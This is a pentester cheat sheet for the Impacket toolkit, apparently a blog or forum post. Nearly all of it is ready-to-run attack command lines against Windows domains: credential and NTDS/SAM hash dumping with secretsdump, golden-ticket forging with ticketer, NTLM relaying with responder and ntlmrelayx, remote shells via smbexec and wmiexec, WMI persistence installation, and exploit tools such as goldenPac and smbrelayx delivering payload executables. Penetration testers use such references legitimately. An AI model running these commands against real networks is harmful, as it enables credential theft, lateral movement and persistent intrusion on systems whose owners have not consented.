d3ndr1t0x  

Impacket Cheat Sheet for Pentesters

About Impacket

Impacket is a collection of Python classes for working with network protocols. It’s widely used in penetration testing for exploiting various Windows protocols. This cheat sheet summarizes its most useful tools with quick commands and tips.

General Authentication Options

-hashes LMHASH:NTHASH      # NTLM hashes
-no-pass                   # Don’t ask for password
-k                         # Use Kerberos (from ccache)
-aesKey <hex key>          # AES key for Kerberos auth (128/256-bit)

Connection Options

-dc-ip <ip>                # IP of the domain controller
-target-ip <ip>            # IP of the target machine

Remote Execution

Techniques that run commands remotely via SMB, WMI, or services:

smbexec.py domain/user:password@target
wmiexec.py domain/user:password@target
tshell.py domain/user:password@target

Kerberos Attacks

Kerberos-focused tools and golden ticket tricks:

ticketer.py -nthash <nthash> -domain-sid <domain-sid> -domain <domain> -user <user>
getTGT.py domain/user:password
getST.py -spn <spn> domain/user:password

Windows Secrets Dumping

secretsdump.py -ntds /root/ntds.dit -system /root/system LOCAL
secretsdump.py -just-dc-ntlm domain/user:pass@target
secretsdump.py -just-dc-ntlm domain/user@target -hashes LM:NTHASH

Mimikatz RPC Client

mimikatz.py domain/user:password@IP
mimikatz.py -dc-ip 10.10.2.1 -target-ip 10.10.2.3 domain/user:password

MiTM & Relaying

responder.py -I eth0 -r -d -w
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c "ipconfig"

SMB Servers

karmaSMB.py filename
smbserver.py SHARENAME /path/to/share
smbserver.py SHARENAME /path/to/share -username user -password pass

WMI Usage

wmiquery.py domain/user:password@IP
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152
wmipersist.py domain/user:password@IP install
wmipersist.py domain/user:password@IP remove

Vulnerabilities & Exploits

goldenPac.py domain/user:password@IP
sambaPipe.py -dc-ip 10.10.2.1 -target-ip 10.10.2.3 domain/user:password -so shell.so
smbrelayx.py -h victimIP -c cmd.exe
smbrelayx.py -h victimIP -e payload.exe

SMB/MSRPC Modules

smbclient.py domain/user:password@IP
getArch.py -target 10.10.2.2
rpcdump.py domain/user:password@IP
ifmap.py 10.10.20.1 135
opdump.py 10.10.1.1 135 UUID version
samrdump.py SERVER/Administrator:T00r@192.168.1.140
services.py SERVER/Administrator:T00r@192.168.1.140 start
netview.py domain/user:password -target 192.168.10.2
reg.py domain/user:password@IP query -keyName HKLM\\SOFTWARE\\Policies
lookupsid.py domain/user:password@IP

MSSQL / TDS Tools

mssqlinstance.py 192.168.1.2
mssqlclient.py -windows-auth domain/user@host

File Format Analysis

esentutl.py dbfile {dump,info,export}
ntfs-read.py "\\C:"
ntfs-read.py "\\C:" -extract "\\windows\\system32\\config\\sam"
registry-read.py registryHive enum_key

Other Useful Tools

GetADUsers.py domain/user:password@IP
mqtt_check.py domain/user:password@IP -ssl
rdp_check.py domain/user:password@IP
rdp_check.py domain/user@IP -hashes LMHASH:NTHASH
sniffer.py {tcp, udp, icmp}
ping.py <src-ip> <dst-ip>
ping6.py <src-ip> <dst-ip>

Final Notes

Some commands require administrative privileges. Always test in lab environments first. Impacket evolves quickly—check the GitHub repo for the latest updates.
